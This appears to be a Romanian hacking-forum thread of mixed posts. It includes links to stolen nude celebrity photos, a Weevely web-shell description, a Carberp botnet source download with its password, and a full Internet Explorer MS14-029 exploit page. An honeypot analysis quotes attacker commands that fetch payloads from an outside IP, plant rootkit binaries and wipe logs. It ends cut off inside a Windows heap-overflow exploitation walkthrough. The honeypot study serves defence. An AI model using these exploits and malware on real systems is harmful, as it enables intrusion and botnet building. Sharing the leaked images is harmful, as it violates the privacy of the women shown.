Nytro

Cacat pe paine: - nu au site (Wiki-shit) - videoclipul de prezentare se adreseaza cocalarilor anonimusi - "grafica" mi-ar fi placut... cand aveam 12 ani Nu se compara Kali, un sistem de operare stabil, mentinut de catre o echipa de profesionisti, cu zdrancaneaua asta. Edit: Ma uit peste scriptul lor de "install-cloud-pizda-pe-paine": echo "deb http://frozenbox.mirror.garr.it/mirrors/parrot stable main" > /etc/apt/sources.list.d/parrot.list echo "deb http://frozenbox.mirror.garr.it/mirrors/debian stable main contrib non-free\ndeb-src http://frozenbox.mirror.garr.it/mirrors/debian stable main contrib non-free\n\ndeb http://frozenbox.mirror.garr.it/mirrors/debian stable-updates main contrib non-free\ndeb-src http://frozenbox.mirror.garr.it/mirrors/debian stable-updates main contrib non-free" > /etc/apt/sources.list.d/debian.list echo "deb http://frozenbox.mirror.garr.it/mirrors/kali kali-only main contrib non-free\ndeb http://frozenbox.mirror.garr.it/mirrors/kali-security kali/updates main contrib non-free" > /etc/apt/sources.list.d/kali.list echo "deb http://repo.mate-desktop.org/debian wheezy main" > /etc/apt/sources.list.d/mate.list wget -qO - http://repository.frozenbox.org/parrot/frozenbox.gpg.key | apt-key add - wget -qO - http://repository.frozenbox.org/parrot/kali.gpg.key | apt-key add - wget -qO - http://repo.mate-desktop.org/debian/mate-archive-keyring.gpg | apt-key add - apt-get update apt-get -y install apt-parrot --no-install-recommends apt-get update apt-get -y install parrot-core parrot-cloud parrot-tools-cloud apt-get dist-upgrade Mai exact: echo "deb http://frozenbox.mirror.garr.it/mirrors/kali kali-only main contrib non-free\ndeb http://frozenbox.mirror.garr.it/mirrors/kali-security kali/updates main contrib non-free" > /etc/apt/sources.list.d/kali.list wget -qO - http://repository.frozenbox.org/parrot/kali.gpg.key | apt-key add - Era evident: E doar un Kali colorat de-am-pulea.

Romanian Porn Team aka Hackerii Porno

Hopa. Au disparut pozele cu Jennifer.

C/C++ and Buffer Overflow Topics Buffer overflow, one of the widely used exploit in the last decades that effect the internet domain in large for example through virii and worms. What is the real cause actually? In this tutorial we will investigate some of the fundamental reasons that can be found in C/C++ programs, applications and processors that can generate the buffer overflow problem. Though most of the C/C++ functions/libraries already implemented new constructs, the secure constructs, the effect still can be seen till today. You will see that programmers also must be competent and have the responsibility in building programs or applications that are secure. [h=1] Introduction - Intro to how and why buffer overflow happens and exploited.[/h] [h=1] Basic of x86 Architecture - The basic of Intel processor internal architecture that related to buffer overflow topics, registers and basic instruction sets operations.[/h] [h=1] Assembly Language - Introduction to the assembly language, needed to program buffer overflow codes during the Shellcode building, payload crafting and shrinking the size of the C programs.[/h] [h=1] Compiler, Assembler & Linker - The process of compiling, assembling and linking C/C++ codes, the step-by-step operations.[/h] [h=5] C Function Operation - The details of the C/C++ function operation, stack call setup and destruction.[/h] [h=1] C Stack Setup - The C/C++ stack story, exposes the exploited buffer in registers.[/h] [h=1] Stack Operation - The C/C++ stack operation that exposes the exploited buffer.[/h] [h=1] Stack-based Buffer Overflow - How the processor's buffer can be over flown by malicious codes.[/h] [h=1] Shellcode: The Payload - Understanding and creating the shellcodes for the buffer overflow payloads, creating the malicious codes.[/h] [h=1] Vulnerability & Exploit Examples - Testing the the real C codes in the real and controlled environment to show the buffer overflow in action. Escalating the local Linux Fedora Core root privilege.[/h] [h=1] C, C++ and Bufferoverflow Books[/h] - See more at: The buffer overflow hands-on tutorial using C programming language on Linux/Unix platforms and Intel microprocessor architecture with C code samples and tons of illustrations

Nude photos of Jennifer Lawrence and others posted online by alleged hacker Website user publishes list of 100 mostly female actors, singers and celebrities of whom they claim to have explicit images Paul Farrell Pictures of Hunger Games star Jennifer Lawrence have been circulating on the internet. Photograph: Rotello/Photofab/REX/Rotello/Photofab/REX Images of more than 100 well-known actors, singers and celebrities, including what appear to be nude photos and videos, may have been exposed by a hacker in a major breach of privacy. On Sunday a user on the 4chan website posted a list of mostly female actors and public figures, including Jennifer Lawrence, Avril Lavigne, Kim Kardashian, Rihanna, Kirsten Dunst, Aubrey Plaza and Winona Ryder, of whom they claim to have explicit photographs or videos. A number of photos from some celebrities, including Hunger Games star Lawrence, have since been circulating on file-sharing and photo sites. 4chan quickly removed the posts from their site but screenshots of the list by one of the posters has a list of more than 60 names of celebrities who are alleged to have been hacked. The release of the images has drawn varying responses from the celebrities, with some conceding they are real photos and others denying their veracity. Buzzfeed reported that the user had also posted images of his desktop, one of which appeared to be an image of Jennifer Lawrence. A spokesman for Lawrence said: “This is a flagrant violation of privacy. The authorities have been contacted and will prosecute anyone who posts the stolen photos of Jennifer Lawrence.” Bla bla. Pozele porno sunt aici: http://www.reddit.com/r/TheFappening/comments/2f44n0/new_celeb_leaked_pics_all_in_one_place/ Jennifer Lawrence: http://imgur.com/a/KWOV2#0 Sursa: Nude photos of Jennifer Lawrence and others posted online by alleged hacker | World news | theguardian.com

Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases). It is written as a single shell script so it can be easily uploaded and run (as opposed to un-tarred, compiled and installed). It can run either as a normal user or as root (obviously it does a better job when running as root because it can read more files). Also see: unix-privesc-check | pentestmonkey Download: https://code.google.com/p/unix-privesc-check/

Weevely is a stealth PHP web shell that provides a telnet-like console. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones. Weevely is currently included in Backtrack and Backbox and all the major Linux distributions oriented for penetration testing. Start with a quick Tutorial, read about Modules and Generators. More than 30 modules to automate administration and post exploitation tasks Backdoor communications are hidden in HTTP Cookies Communications are obfuscated to bypass NIDS signature detection Backdoor polymorphic PHP code is obfuscated to avoid HIDS AV detection Download: https://epinna.github.io/Weevely/

[h=1][/h] Whonix is an operating system focused on anonymity, privacy and security. It's based on the Tor anonymity network[1], Debian GNU/Linux[2] and security by isolation. DNS leaks are impossible, and not even malware with root privileges can find out the user's real IP. Whonix consists of two parts: One solely runs Tor and acts as a gateway, which we call Whonix-Gateway. The other, which we call Whonix-Workstation, is on a completely isolated network. Only connections through Tor are possible. To learn more about security and anonymity under Whonix, please continue to the About Whonix page. Info: https://www.whonix.org/

Have fun: Leaks - Imgur Jennifer Lawrence si alte vedete "naked" :->

[h=2]Carbep botnet, source code[/h]Online: https://github.uconn.edu/kll09002/Carberp Download: https://mega.co.nz/#!0YsXWBRD!CMqd9nrm1d0XABKlifI9vmxprpQ6RnfsdhBHeKrDXao Password: KJ1#w2*LadiOQpw3oi029)K Oa(28)uspeh Via: https://www.opensc.ws/leaked-sources/19525-carbep-botnet-source-code.html

O poza mai mare cu tex: Nu va speriati de sabie, e pentru dusmani, oamenii nevinovati nu au de ce sa se teama (daca platesc taxele de protectie).

An in-depth analysis of SSH attacks on Amazon EC2 Summary The research study investigates Secure Shell (SSH) attacks on Amazon EC2 cloud instances across different AWS zones by means of deploying Smart Honeypot (SH). It provides an in-depth analysis of SSH attacks, SSH intruders profile, and attempts to identify their tactics and purposes. Key observations for this research experiment are as following: Without disclosure of SH’s IP addresses, in less than 10 hours, first brute-force attempt was detected. Over 89% of intruders only targeted one SH in one zone; Three threat actors (attacker’s profile) were detected – brute-forcer, infector and commander – by which their source IP addresses were completely different; Typically, blacklists are limited to prevent the first threat actor i.e. brute-forcer and not the other two; Top three (3) origin country of attacks (based on whois information) were China, Russia and Egypt; Some password lists used for brute-forcing SSH service were limited to few passwords and targeted toward compromising other malicious groups infected hosts; VoIP services, network appliances and development tools account names were constantly targeted by intruders; Upon a successful password guess, a new actor (Infector) appeared to upload malicious files to SH and a connection were made to an external Command and Control server; A number of tactics were used to hide malicious executable, replace legitimate executable with infected ones and disable audit functionalities of the operating system; A third actor (Commander) employed the infected SH to conduct denial-of-service (DoS) attacks; On average intruders’ source IP address was observed for a day and there was no further connection to check the status of the infected host or re-deploy the malicious files. Introduction Start a Cloud instance and you will be shocked with the number of ‘malicious’ attempts against your vanilla Cloud server. Well, you may not be even aware of those if you don’ monitor your network traffic, in and out of your server. Password brute-force attempt is among one of the common security attacks and adversaries are performing Internet-wide scanning, probing and penetrating of weak credentials on SSH services. As one of the use-cases for Smart Honeypot, I did a research experiment on SSH password brute-force attempts in Amazon EC2 environment to profile the adversaries and identify their tactics. Experiment setup The following list illustrates details of the experiment. Number of Smart Honeypots: three (3) Period of experiment: fourteen (14) days Start and end dates: 7 May 2014 to 21 May 2014 EC2 regions: North California (US), Oregon (US), Singapore (SG) Cloud instance base-image: Ubuntu 13.04 – EC2 Micro Instance IP address: Default EC2 Public IP range for each zone For each SH, I used EC2 Micro Instance as a base which has a SSH service exposed by default. From external perspective, this resemble like a typical EC2 Micro Instance. SH is equipped with its own unique technologies and at it has not borrowed from any known honeypot solution (as argued here ). Additionally, the techniques that are used within SH cannot be publicly disclosed in order to hide its presences from attackers and make it ideal to profile them. No domain name was mapped to the SH public IP addresses and their addresses were not disclosed or advertised anywhere. SSH service was modified to accept authentication through username and password (i.e. keyboard based) as well as public-private keys. An additional username (i.e. git) with a weak password was created on SSH server. The super user (i.e. root) password was also selected from a common password word-lists. Passwords on each SH were selected differently. Throughout the experiment, once an account was compromised and intruder was profiled, the password was changed to a different combination. Outgoing network traffic was actively monitored and filtered. This was a safe-guard not to allow the infrastructure to be (mis)used to target other Internet hosts Observation On all observations, I assume there is only one actor behind a single IP address. It took less than ten (10) hours to receive a first brute-force attempt on the SH. First successful password guess happened in 5 days and the subsequent successful attempt happened in less than 2 days. 91 unique successful password guesses happened during the experiment period. Three threat actors were identified during the experiment (Figure 1) in which they sourced from a unique IP address. Figure 1: Three (3) threat actors behind all SSH attacks Brute-forcer Brute-force (bot) attempted to brute force the target to find a correct username and password combination. As expected their behaviour was fully automated. Some bots attempted guessing a single username and password combination across all SHs and once unsuccessful, they move to the next password combination. This behavior was noticed since the bot IP address was observed across SHs in a short span of time (usually a few seconds); Some bots attempted to brute-force a set of username and password combination on a single SH and then moved to the next SH.. Some bots used threading and initiated parallel connections to the SSH service. This behavior was noticeable as password brute-force attempt did not stop immediately after a successful guess. The majority of bots only targeted one SH. 12% of bots source IP address were observed on all the SHs while the remaining 88% only targeted one SH. The majority of bots were seen over a single day and a few over span of two days. No further activity was observed from the same source of IP address. Figure 2: Percentage of intruders that target all Smart Honeypots v.s. one Smart Honeypot Password lists Some bots tried a limited set of passwords, normally less than 5 items. The password combination was not something common and it seems like they target particular servers or attempt to penetrate to other malicious groups compromised servers: @#$%hackin2inf3ctsiprepe@#$% darkhackerz01 ullaiftw5hack t0talc0ntr0l4! Among password there were instances such as “shangaidc” and “lanzhon” (Chinese terms) that was initially collected on Singapore-based SH however, later on, the passwords were observed on the other zones. The majority of bots used publicly available password lists such as RockYou or 500 worst passwords lists (see https://wiki.skullsecurity.org/Passwords). Targeted user accounts The majority of attempts were targeted on super accounts such as “root” or “admin”. The other group of highly targeted usernames were network appliances, development tools, and VoIP services:: teamspeak (a VoIP software, popular among video game players)) git, svn (code repositories for software development) nagios, vyatta (network appliances) Demographic Note: The reader should be reminded that the information were collected only by looking at the registration information (i.e. whois) of the intruder IP address and it should not perceived as the intrusions are orchestrated by a particular nation. A computer savvy person is aware of the fact that source IP addresses can be easily spoofed. The following picture demonstrate the origin country of the bot based on the IP whois information. Figure 3: SSH attacks’ origin countries (top left Singapore and right top and bottom US SHs) The majority of the attempts were sourced from China. Following by Russia targeting Singapore-based SH and Egypt for US-based SHs. There was no intrusion observed from Russia on US-based SH and from Egypt on Singapore-based SHs throughout the experiment. Infector Upon a successful brute-force attempt, bot stopped communicating with SH (only in one instance the bot continued brute-forcing however targeting a different user account) and it was interesting to observe there was no further connection from the bot’s source IP address, instead a new IP address with the correct username and password was observed to authenticate to the SSH. The new intruder, which I called it Infector, attempted to infect SH by using malicious scripts or binary files. The majority of the infectors used Secure Copy (scp) to transfer files to SH while there were instances where ‘wget’ was used to download malicious files from an external server. Upon successful file upload, infector executed a number of commands prior and after execution of malicious files. In the example below, infector checks for the available memory on the host, checks for last logged users, changes the permission settings on the malicious script (i.e. httpd.pl) and executes it. Finally she clears the history of her commands. "free -m",<ret>,"last",<ret>,"cd /var/tmp",<ret>,"chmod 777 httpd.pl",<ret>,"perl httpd.pl",<ret>,"cd",<ret>,"rm -rf .bash_history",<ret>,"history -c && clear",<ret>,"history -c && clear",<ret> In another example (below), infector first checks whether the system is 64bit or 32bit, then after relaxing the malicious binary permissions, it executes the binary and puts it in the background to make sure the process is running even after logging out. "getconf LONG_BIT",<ret>,<^V>,"chmod 0755 ./DDos32",<ret>,"/dev/null 2>&1 &",<ret>,"nohup ./DDos32 > /dev/null 2>&1 &",<ret> The above two examples were found to be scripted or automated, however, there were few instances that the interaction seems to be manual. Infector was found to key-in the commands, frequently use ‘backspace’ key to correct the typos (see below). bash "cd /etc",<ret>,"wget http://94.199.187.154/.../k.tgz; tar zxvf k.tgz ; rm -rf k.tgz;" ,<ret>," cd .kde; chmod +x *; ./start.sh; ",<ret>," ./bleah 87.98.216.186; ./bleah mgx1.magex.hu; ",<ret>,"/sbin/service crond restart",<ret>, "service crond restart",<ret>,"/etc/init.d/crond restart",<nl>,"w",<nl>, " historye",<backspace>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>, <backspace>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>, <backspace>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>, <backspace>,<backspace>,<backspace>,"oasswd",<ret>,"passwd",<ret>, "history -c",<ret>,"exit",<ret> After deployment of the malicious files, no further interactions observed from infectors. In some instances, I even killed the malicious process, in order to see if the infector attempts to reconnect and re-deploy the malicious file. Infector used a number of techniques to hide the existence of malicious files or replace legitimate binaries with malicious equivalents. Additionally, the infector attempted to clean her tracks by resetting the audit log file or disabling it. The following is the series of commands that infector executed on the SH where she replaced the legitimate binaries with malicious ones and attempted to load and execute a malicious kernel module. chmod 0755 /tmp/.bash_root.tmp3 nohup /tmp/.bash_root.tmp3 nohup /tmp/.bash_root.tmp3 chattr +i .bash_root.tmp3 chattr +i /tmp/.bash_root.tmp3 insmod /usr/lib/xpacket.ko ln -s /etc/init.d/DbSecuritySpt /etc/rc1.d/S97DbSecuritySpt ln -s /etc/init.d/DbSecuritySpt /etc/rc2.d/S97DbSecuritySpt ln -s /etc/init.d/DbSecuritySpt /etc/rc3.d/S97DbSecuritySpt ln -s /etc/init.d/DbSecuritySpt /etc/rc4.d/S97DbSecuritySpt ln -s /etc/init.d/DbSecuritySpt /etc/rc5.d/S97DbSecuritySpt mkdir -p /usr/bin/bsd-port cp -f /tmp/.bash_root.tmp3 /usr/bin/bsd-port/getty usr/bin/bsd-port/getty mkdir -p /usr/bin/dpkgd cp -f /bin/netstat /usr/bin/dpkgd/netstat mkdir -p /bin cp -f /tmp/.bash_root.tmp3 /bin/netstat chmod 0755 /bin/netstat cp -f /bin/ps /usr/bin/dpkgd/ps mkdir -p /bin cp -f /tmp/.bash_root.tmp3 /bin/ps chmod 0755 /bin/ps cp -f /usr/bin/lsof /usr/bin/dpkgd/lsof mkdir -p /usr/bin cp -f /tmp/.bash_root.tmp3 /usr/bin/lsof chmod 0755 /usr/bin/lsof mkdir -p /usr/bin cp -f /tmp/.bash_root.tmp3 /usr/bin/smm usr/bin/smm ln -s /etc/init.d/selinux /etc/rc1.d/S99selinux ln -s /etc/init.d/selinux /etc/rc2.d/S99selinux ln -s /etc/init.d/selinux /etc/rc3.d/S99selinux ln -s /etc/init.d/selinux /etc/rc4.d/S99selinux ln -s /etc/init.d/selinux /etc/rc5.d/S99selinux usr/bin/bsd-port/udevd insmod /usr/lib/xpacket.ko The following examples shows the audit logs were disabled (i.e. piped to null). ubuntu@ip-172-31-6-109:~$ ls -l /var/log total 1040 …[sNIP]… lrwxrwxrwx 1 root root 9 May 20 12:26 auth.log -> /dev/null -rw-r----- 1 syslog adm 296097 May 18 07:24 auth.log.1 -rw-r----- 1 syslog adm 7095 May 14 07:32 auth.log.2.gz -rw-r--r-- 1 root root 1535 May 13 14:16 boot.log lrwxrwxrwx 1 root root 9 May 20 12:26 btmp -> /dev/null -rw-r--r-- 1 syslog adm 37823 May 13 14:16 cloud-init.log drwxr-xr-x 2 root root 4096 Oct 10 2012 dist-upgrade …[sNIP]… lrwxrwxrwx 1 root root 9 May 20 12:26 lastlog -> /dev/null lrwxrwxrwx 1 root root 9 May 20 09:48 messages -> /dev/null lrwxrwxrwx 1 root root 9 May 20 09:48 secure -> /dev/null lrwxrwxrwx 1 root root 9 May 20 12:26 security -> /dev/null lrwxrwxrwx 1 root root 9 May 20 12:26 utx.lastlogin -> /dev/null lrwxrwxrwx 1 root root 9 May 20 12:26 utx.log -> /dev/null lrwxrwxrwx 1 root root 9 May 20 12:26 wtmp -> /dev/null lrwxrwxrwx 1 root root 9 May 20 09:48 xferlog -> /dev/null The following is the output of nestat during the infection. Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 673/sshd tcp 0 0 127.0.0.1:10808 0.0.0.0:* LISTEN 22589/.bash_root.tm tcp 0 0 127.0.0.1:10808 127.0.0.1:40878 ESTABLISHED 22589/.bash_root.tm tcp 0 0 172.31.6.109:22 60.169.77.233:4660 ESTABLISHED 23350/0 tcp 0 0 127.0.0.1:40878 127.0.0.1:10808 ESTABLISHED 22583/.bash_root.tm tcp 0 60 172.31.6.109:37806 183.57.38.250:36000 ESTABLISHED 22583/.bash_root.tm tcp6 0 0 :::22 :: LISTEN 673/sshd udp 0 0 0.0.0.0:53 0.0.0.0:* 19684/tinydns udp 0 0 0.0.0.0:68 0.0.0.0:* 468/dhclient3 And the following example shows list of files uploaded and extracted on the SH. root@ip-172-31-6-109:~# ls -al /tmp total 1848 drwxrwxrwt 4 root root 4096 May 23 01:20 . drwxr-xr-x 24 root root 4096 May 20 11:54 .. -rwxr-xr-x 1 root root 1344645 May 20 11:39 .bash_root.tmp3 -rwxr-xr-x 1 root root 353564 May 21 12:55 .bash_root.tmp3h -rwxr-xr-x 1 root root 5 May 21 12:55 bill.lock -rw-r--r-- 1 root root 69 May 22 16:03 conf.n -rwxr-xr-x 1 root root 5 May 21 12:55 gates.lock drwxr-xr-x 2 root root 4096 Apr 21 04:17 get -rw-r--r-- 1 root root 147456 May 17 17:18 go.tar.gz drwx------ 2 root root 4096 May 20 11:52 mc-root -rwxr-xr-x 1 root root 5 May 21 12:55 moni.lock -rw-r--r-- 1 root root 72 May 21 01:51 rc.local -rw-r--r-- 1 root root 19 May 21 01:32 resolv.conf Commander Upon successful deployment of malicious files, in all cases, an outbound connection was initiated from the SH to a C&C server. Commander, the third actor, is a malicious entity who controls the C&C server and remotely sends command to infected hosts. Figure 4 shows the IRC welcome message from one of the C&C servers. Figure 4: an example of IRC welcome message on a C&C server hosted on 5.254.116.134 (provider: Voxility) In most cases, C&C server was IRC based and infected host joined an IRC channel and got assigned a nickname for communication with the Commander. Throughout the experiment, the infected SHs were employed to initiate DoS attacks against two external servers: :Gucci!Gucci@34635712.46 PRIVMSG #Support :!bot @udpflood 198.61.234.201 53 65500 60.. :Gucci!Gucci@34635712.46 PRIVMSG #Support :!bot @udpflood 245.167.133.214 53 65500 120.. And below is the response from the infected host once task is completed PRIVMSG #Support :.4|.12.:.3UDP DDoS.12:..4|.12 Attacking .4 198.61.234.201 53 .12 with .4 65500 .12 Kb Packets for .4 60 .12 seconds.. The attack was targeted on port 53 (DNS) for the duration of 60 seconds and 120 seconds. Please note that all outbound connections from SH were monitored and filtered in order to prevent any possible harm to external servers. That’s all for now. There are still other interesting points that I am investigating and will cover them in the future posts. How to protect yourself against SSH attacks Three (3) tips that can strongly improve the security posture of your SSH service (there are lots other things your can do but these three will help the most): Be cautious of running blacklisting software such as Fail2ban. You may crash your own server (more details https://wiki.archlinux.org/index.php/fail2ban). Instead whitelist the access to the SSH service, if not possible, use an external blacklist feed to block intruders. Remember, if you use a generic blacklist feed, on average, it blocks 12% of your actual intruders; Disable username and password (keyboard-based) authentication on the SSH service. If not possible setup a Two-Factor authentication (more here); and Run the SSH service on a non-default port (security by obscurity!). Malicious scripts and binary files, password lists etc. are available for download to the research community. Get in touch if you interested to a receive a copy. Do you want to find out more about your environment’s attackers and their tactics? Fill up this form for an invitation to a free Smart Honeypot VIP plan.Sursa: An in-depth analysis of SSH attacks on Amazon EC2 | Smart Honeypot

Microsoft Internet Explorer MS14-029 Memory Corruption Authored by PhysicalDrive0 Microsoft Internet Explorer memory corruption proof of concept exploit that leverages the vulnerability noted in MS14-029. <!doctype html> <html> <head> <meta http-equiv="Cache-Control" content="no-cache"/> <sc?ript > func?tion stc() { var Then = new Date(); Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 ); document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString(); } func?tion cid() { var swf = 0; try { swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) { } if (!swf) return 0; var cookieString = new String(document.cookie); if(cookieString.indexOf("d93kaj3Nja3") == -1) {stc(); return 1;}else{ return 0;} } String.prototype.repeat=func?tion (i){return new Array(isNaN(i)?1:++i).join(this);} var tpx=un?escape ("%u1414%u1414").repeat(0x60/4-1); var ll=new Array(); for (i=0;i<3333;i++)ll.push(document.create?Element("img")); for(i=0;i<3333;i++) ll[i].className=tpx; for(i=0;i<3333;i++) ll[i].className=""; CollectGarbage(); func?tion b2() { try{xdd.re?placeNode(document.createTextNode(" "));}catch(exception){} try{xdd.outerText='';}catch(exception){} CollectGarbage(); for(i=0;i<3333;i++) ll[i].className=tpx; } func?tion a1(){ if (!cid()) return; document.body.contentEditable="true"; try{xdd.applyElement(document.create?Element("frameset"));}catch(exception){} try{document.selection.createRange().select();}catch(exception){} } </ sc?ript > </head> <body onload='setTimeout("a1();",2000);' onresize=b2()> <marquee id=xdd > </marquee> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE"> <param name="movie" value="storm.swf" /> <param name="quality" value="high" /> <param name="bgcolor" value="#ffffff" /> <param name="allowScriptAccess" value="sameDomain" /> <param name="allowFullScreen" value="true" /> </object> </body> <body> <form name=loading> ¡¡<p align=center> <font color="#0066ff" size="2"> Loading....,Please Wait</font> <font color="#0066ff" size="2" face="verdana"> ...</font> ¡¡¡¡<input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;"> ¡¡¡¡ ¡¡¡¡<input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;"> ¡¡¡¡<sc?ript > ¡¡ var bar=0¡¡ var line="||"¡¡ var amount="||"¡¡ count()¡¡ func?tion count(){¡¡ bar=bar+2¡¡ amount =amount + line¡¡ document.loading.chart.value=amount¡¡ document.loading.percent.value=bar+"%"¡¡ if (bar<99)¡¡ {setTimeout("count()",500);}¡¡ else¡¡ {window.location = "http://www.google.com.hk";}¡¡ }</ sc?ript > ¡¡</p> </form> <p align="center"> Wart,<a style="text-decoration: none" href="http://www.google.com.hk"> <font color="#FF0000"> kick me</font> </a> .</p> </body> </html> Sursa: Microsoft Internet Explorer MS14-029 Memory Corruption ? Packet Storm

Exact asta voiam eu sa postez. Pacat ca momentan sunt toti la "Interlopi" la Offtopic

[h=3]Windows Heap Overflow Exploitation[/h] Hi , In this article I will be talking about exploiting a custom heap : which is a big chunk of memory allocated by the usermode application using VirtualAlloc for example . The application will then work on managing 'heap' block allocations and frees (in the allocated chunk) in a custom way with complete ignorance of the Windows's heap manager. This method gives the software much more control over its custom heap, but it can result in security flaws if the manager doesn't do it's job properly , we'll see that in detail later. To see an implementation of a custom heap manager in C/C++ please refer to my previous blog post : Reverse Engineering 0x4 Fun: Creating and using your own 'heap' manager Heap Manager Source code : [C++] Custom Heap Manager - Pastebin.com The vulnerability that we'll exploit together today is a 'heap' overflow vulnerability that's occuring in a custom heap built by the application. The vulnerable software is : ZipItFast 3.0 and we'll be exploiting it today and gaining code execution under Windows 7 . ASLR , DEP , SafeSEH aren't enabled by default in the application which makes it even more reliable to us . Even though , there's still some painful surprises waiting for us ... Let's just start : The Exploit : I've actually got the POC from exploit-db , you can check it right here : ZipItFast 3.0 - (.ZIP) Heap Overflow Exploit Oh , and there's also a full exploit here : ZipItFast PRO 3.0 - Heap Overflow Exploit Unfortunately , you won't learn much from the full exploitation since it will work only on Windows XP SP1. Why ? simply because it's using a technique that consists on overwriting the vectored exception handler node that exists in a static address under windows XP SP1. Briefly , all you have to do is find a pointer to your shellcode (buffer) in the stack. Then take the stack address which points to your pointer and after that substract 0x8 from that address and then perform the overwrite. When an exception is raised , the vectored exception handlers will be dispatched before any handler from the SEH chain, and your shellcode will be called using a CALL DWORD PTR DS: [ESI + 0x8] (ESI = stack pointer to the pointer to your buffer - 0x8). You can google the _VECTORED_EXCEPTION_NODE and check its elements. And why wouldn't this work under later versions of Windows ? Simply because Microsoft got aware of the use of this technique and now EncodePointer is used to encode the pointer to the handler whenever a new handler is created by the application, and then DecodePointer is called to decode the pointer before the handler is invoked. Okay, let's start building our exploit now from scratch. The POC creates a ZIP file with the largest possible file name , let's try it : N.B : If you want to do some tests , execute the software from command line as follows : Cmd :> C:\blabla\ZipItFast\ZipItFast.exe C:\blabla\exploit.zip Then click on the Test button under the program. Let's try executing the POC now : An access violation happens at 0x00401C76 trying to access an invalid pointer (0x41414141) in our case. Let's see the registers : Basically the FreeList used in this software is a circular doubly linked lists similar to Windows's . The circular doubly linked list head is in the .bss section at address 0x00560478 and its flink and blink pointers are pointing to the head (self pointers) when the custom heap manager is initialized by the software. I also didn't check the full implementation of the FreeList and the free/allocate operations in this software to see if they're similar to Windows's (bitmap , block coalescing ...etc). It's crucial also to know that in our case , the block is being unlinked from the FreeList because the manager had a 'request' to allocate a new block , and it was chosen as best block for the allocation. Let's get back to analysing the crash : - First I would like to mention that we'll be calling the pointer to the Freelist Entry struct : "entry". Registers State at 0x00401C76 : EAX = entry->Flink EDX = entry->Blink [EAX] = entry->Flink->Flink [EAX+4] = entry->Flink->Blink (Next Block's Previous block) [EDX] = entry->Blink->Flink (Previous Block's Next Block) [EDX+4] =entry->Blink->Blink Logically speaking : Next Block's Previous Block and Previous Block's Next Block are nothing but the current block. So the 2 instructions that do the block unlinking from the FreeList just : - Set the previous freelist entry's flink to the block entry's flink. - Set the next freelist entry's blink to the block entry's blink. By doing so , the block doesn't belong to the freelist anymore and the function simply returns after that. So it'll be easy to guess what's happening here , the software allocates a static 'heap' block to store the name of the file and it would have best to allocate the block based on the filename length from the ZIP header (this could be a fix for the bug , but heap overflows might be found elsewhere , I'll propose a better method to fix ,but not fully, this bug later in this article). Now , we know that we're writing past our heap block and thus overwriting the custom metadata of the next heap block (flink and blink pointers). So, We'll need to find a reliable way to exploit this bug , as the 2 unlinking instructions are the only available to us and we control both EAX and EDX. (if it's not possible in another case you can see if there are other close instructions that might help), you can think of overwriting the return address or the pointer to the structured exception handler as we have a stack that won't be rebased after reboot. This might be a working solution in another case where your buffer is stored in a static memory location. But Under Windows 7 , it's not the case , VirtualAlloc allocates a chunk of memory with a different base in each program run. In addition , even if the address was static , the location of the freed block that we overwrite varies. So in both cases we'll need to find a pointer to our buffer. The best place to look is the stack , remember that the software is trying to unlink (allocate) the block that follows the block where we've written the name , so likely all near pointers in the stack (current and previous stack frame) are poiting to the newly allocated block (pointer to metadata) . That's what we don't want because flink and blink pointers that we might set might not be valid opcodes and might cause exceptions , so all we need to do is try to find a pointer to the first character of the name and then figure out how to use this pointer to gain code execution , this pointer might be in previous stack frames. And here is a pointer pointing to the beginning of our buffer : 3 stack frames away Remember that 0x01FB2464 will certainly be something else when restarting the program , but the pointer 0x0018F554 is always static , even when restarting the machine. So when I was at this stage , I started thinking and thinking about a way that will help me redirect execution to my shellcode which is for sure at the address pointed by 0x0018F554 , and by using only what's available to me : - Controlled registers : EAX and EDX. - Stack pointer to a dynamic buffer pointer. - 2 unlinking instructions. - No stack rebase. Exploiting the vulnerability and gaining code execution: And Then I thought , why wouldn't I corrupt the SEH chain and create a Fake frame ? Because when trying to corrupt an SEH chain there are 3 things that you must know : - SafeSEH and SEHOP are absent. - Have a pointer to an exisiting SEH frame. - Have a pointer to a pointer to the shellcode. The pointer to the shellcode will be treated as the handler,and the value pointed by ((ptr to ptr to shellcode)-0x4) will be treated as the pointer to the next SEH frame. Let's illustrate the act of corrupting the chain : (with a silly illustration , sorry) Let me explain : we need to achieve our goal by using these 2 instructions , right ? : MOV [EDX],EAX MOV [EAX+4], EDX We'll need 2 pointers and we control 2 registers , but which pointer give to which register ? This must not be a random choice because you might overwrite the pointer to the shellcode if you chose EAX as a pointer to your fake SEH frame. So we'll need to do the reverse , but with precaution of overwriting anything critical. In addition we actually don't care about the value of "next SEH frame" of our fake frame. So our main goal is to overwrite the "next SEH frame" pointer of an exisiting frame , to do so we need to have a pointer to our fake frame in one of the 2 registers. As [EAX+4] will overwrite the pointer to the buffer if used as a pointer to the fake SEH frame , we will use EDX instead. We must not also overwrite the original handler pointer because it will be first executed to try to handle the exception , if it fails , then our fake handler (shellcode) will be invoked then. So : EDX = &(pointer to shellcode) - 0x4 = Pointer to Fake "Next SEH frame" element. EDX must reside in the next frame field of the original frame which is : [EAX+4]. And EAX = SEH Frame - 0x4. Original Frame after overwite : Pointer to next SEH : Fake Frame Exception Handler : Valid Handler Fake Frame : Pointer to next SEH : (Original Frame) - 0x4 (we just don't care about this one) Exception Handler : Pointer to shellcode The SEH frame I chose is at : 0x0018F4B4 So : EAX = 0x0018F4B4 - 0x4 = 0x0018F4B0 and EDX =0x0018F554 - 0x4 = 